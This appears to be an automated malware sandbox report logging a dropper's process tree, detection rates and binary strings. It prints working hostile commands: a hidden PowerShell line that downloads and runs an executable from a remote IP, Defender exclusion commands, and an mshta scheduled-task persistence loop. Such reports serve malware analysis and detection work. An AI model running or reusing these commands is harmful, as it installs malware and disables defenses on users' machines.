                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731396091.0000000005C37000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1742666205.0000000005C01000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2083119638.00000000053C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                      Source: 5EfYBe3nch.exeVirustotal: Detection: 57%
                                      Source: 5EfYBe3nch.exeReversingLabs: Detection: 68%
                                      Source: DLTDCR8UJINP8YM8Y.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile read: C:\Users\user\Desktop\5EfYBe3nch.exeJump to behavior
                                      Source: unknownProcess created: C:\Users\user\Desktop\5EfYBe3nch.exe "C:\Users\user\Desktop\5EfYBe3nch.exe"
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess created: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe "C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe"
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess created: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe "C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2532,i,194429869990168625,15952654104286526846,262144 /prefetch:8
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\GIIIIJDHJE.exe "C:\Users\user\Documents\GIIIIJDHJE.exe"
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe "C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\YQNZByFp\jyidkjkfhjawd.exe "C:\YQNZByFp\jyidkjkfhjawd.exe"
                                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess created: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe "C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe"Jump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess created: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe "C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe"Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe"Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2532,i,194429869990168625,15952654104286526846,262144 /prefetch:8Jump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "Jump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"Jump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\GIIIIJDHJE.exe "C:\Users\user\Documents\GIIIIJDHJE.exe" Jump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe "C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\YQNZByFp\jyidkjkfhjawd.exe "C:\YQNZByFp\jyidkjkfhjawd.exe"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
